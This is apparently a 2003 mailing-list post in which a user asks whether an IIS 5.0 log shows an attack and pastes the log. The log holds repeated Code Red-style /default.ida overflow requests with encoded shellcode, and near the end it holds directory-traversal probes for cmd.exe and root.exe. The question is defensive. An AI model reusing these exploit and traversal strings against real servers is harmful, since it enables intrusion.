Hello colleagues:
I have a question: what does this Internet Information Server log mean?
Is it an attack report?
Jorge
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-06-23 00:06:21
#Fields: date time c-ip cs-username s-ip s-port cs-method
cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-06-23 00:06:21 200.104.81.69 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 00:07:01 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 00:08:07 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 01:18:41 200.162.231.11 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 01:29:36 200.24.83.103 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 01:37:03 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 01:38:09 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 02:59:16 63.171.232.249 - 200.24.68.45 80
GET /exchange - 401 Mozilla/4.0+
(compatible;+MSIE+6.0;+Windows+NT+5.1)
2003-06-23 03:14:03 200.76.215.24 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 03:26:03 192.168.0.100 - 192.168.0.100 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 03:27:09 192.168.0.100 - 192.168.0.100 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 04:11:56 66.30.129.134 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 05:06:19 200.21.248.146 - 200.24.68.45 80
GET /exchweb/img/tool-refresh.gif - 304 Mozilla/3.01+
(compatible;)
2003-06-23 05:08:04 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 05:09:09 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 06:22:19 200.24.183.216 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 06:30:19 200.24.183.216 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 07:03:04 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 07:04:10 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 07:10:44 61.187.54.205 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 08:44:06 192.168.0.100 - 192.168.0.100 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 08:45:11 192.168.0.100 - 192.168.0.100 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 08:46:03 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 08:47:08 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 09:15:18 81.80.106.35 - 200.24.68.45 80
GET /exchange - 401 Mozilla/4.0+
(compatible;+MSIE+5.5;+Windows+NT+5.0;+Hotbar+4.3.1.0)
2003-06-23 09:23:50 69.2.204.102 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 10:29:06 192.168.0.100 - 192.168.0.100 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 10:30:12 192.168.0.100 - 192.168.0.100 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 10:39:03 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 10:40:09 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 11:27:39 218.18.83.172 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 11:34:56 200.12.25.80 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 12:09:07 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 12:10:13 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 12:15:03 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 12:16:09 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 12:31:36 200.149.217.195 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 12:51:07 200.45.99.34 - 200.24.68.45 80
GET /scripts/root.exe /c+dir 404 -
2003-06-23 12:51:10 200.45.99.34 - 200.24.68.45 80
GET /MSADC/root.exe /c+dir 403 -
2003-06-23 12:51:15 200.45.99.34 - 200.24.68.45 80
GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-06-23 12:51:17 200.45.99.34 - 200.24.68.45 80
GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-06-23 12:51:25 200.45.99.34 - 200.24.68.45 80
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2003-06-23 12:51:28 200.45.99.34 - 200.24.68.45 80
GET /_vti_bin/..%5c../..%5c../..%
5c../winnt/system32/cmd.exe /c+dir 500 -
2003-06-23 12:51:35 200.45.99.34 - 200.24.68.45 80
GET /_mem_bin/..%5c../..%5c../..%
5c../winnt/system32/cmd.exe /c+dir 404 -